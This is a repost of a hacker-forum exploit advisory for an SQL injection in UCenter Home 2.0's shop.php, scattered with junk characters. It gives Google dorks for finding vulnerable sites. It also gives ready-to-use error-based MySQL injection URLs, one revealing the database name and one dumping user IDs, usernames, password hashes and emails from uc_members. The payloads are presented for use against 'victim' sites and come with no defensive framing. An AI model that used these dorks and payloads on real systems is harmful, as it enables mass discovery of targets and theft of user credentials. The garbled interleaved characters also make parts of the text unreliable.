( [/ h$ i7 e* V5 z* \# _( J__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
) ~7 a! o* ~0 Z' z5 [( V' u( l% r* u, Y" e4 U3 p! l
1 s. {! I d4 T) s
- R1 o# z! u9 z/ B3 Y# a
*/ Author : KnocKout
* V6 p' j8 A0 @" |# k$ [+ u$ n3 j6 |& Q& s
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers ' V$ b, Q! J8 k0 M$ r1 b
; N2 b0 G* t9 z*/ Contact: knockoutr@msn.com
* ?9 K W9 z. @. A3 K: d( ~. {4 j1 V0 h8 @
*/ Cyber-Warrior.org/CWKnocKout * t1 |5 h, j3 [( t& Z- T$ `
. w. O3 M8 H5 m3 W/ D, y__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 0 [) U, A! M. V" K; R4 \
! l L* v( V+ C7 X; W R8 p, ?! }
Script : UCenter Home
4 g9 i/ ]. d1 R% J/ ~
! d" O2 B* g) l. U! tVersion : 2.0
3 x5 O! ^' b- V: U# H/ @$ k. g
, R9 p9 |+ b/ ~$ _! v$ T9 j/ xScript HomePage : http://u.discuz.net/ # Y; _5 t1 r# C$ N! B- h# p+ P
/ w1 X1 l `7 ~8 A# D
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 7 `9 |" N; S; m2 ] `- ~, |3 V7 ^
3 O8 H4 u& R6 X3 X
Dork : Powered by UCenter inurl:shop.php?ac=view
% w- e0 H# k) y$ Z. S& i4 {! |2 l# T" l8 x1 ^
Dork 2 : inurl:shop.php?ac=view&shopid= / A: B3 J% N! Y/ l5 r6 \
! p( W7 b: k9 s" h0 d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 6 D. _6 I! s, q; `5 Y* {
% ]9 x+ h2 @3 s* f1 y% @& t
Vuln file : Shop.php
& M5 u# n ^$ L3 [; x/ S1 b& g8 O3 ~7 }- n- C
value's : (?)ac=view&shopid=
* j; p2 y, T9 X! r I8 y4 \
, G8 a' _9 ]( ?* E3 c% M$ MVulnerable Style : SQL Injection (MySQL Error Based)
' v! k+ n9 o! Z3 K4 E5 Q c
2 L& ~( c$ E( |. m& i- T# ^Need Metarials : Hex Conversion , o- F$ M9 o7 B9 C# l+ h( X% ]
! ~8 n2 x' N9 U3 s5 X__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- @! {7 I: H3 V: L3 |. I- |8 Y8 I T
& Y+ j+ N+ N( hYour Need victim Database name. : G" K/ W* [0 e5 F+ t, X
: ?7 s; c7 [) J/ Lfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 8 q W; L5 d9 H
! O# _6 r: x: \% l.. $ J. \. `" R: y1 B( W( u1 S) O. L- ?
9 m! ~( d8 H8 e* B8 e/ `DB : Okey. & ^, n+ M, u- C' E
5 K: _/ R9 C, Uyour edit DB `[TARGET DB NAME]`
% u" s/ v4 d+ J/ q c5 Q9 ]$ P- U; a7 z0 J* {
Example : 'hiwir1_ucenter' 6 w( D, |* H# d* {" R% W
2 E+ s- D7 w( e1 fEdit : Okey.
( S" N0 L- V, h S7 [! J1 x5 i
* ?( H* d- E: Y& o K9 V# iYour use Hex conversion. And edit Your SQL Injection Exploit..
; I5 ], [. I' q- \/ i' Q& Q" y* q8 L" U. A# r+ _* ~, F0 ~6 b: f
/ `4 g" W2 t [4 K" O: d/ |
: z* Y8 {3 }0 f; n( SExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 * ^( f; W v5 A7 H. v
|
发表于 2013-2-27 21:31:31
收藏
支持
反对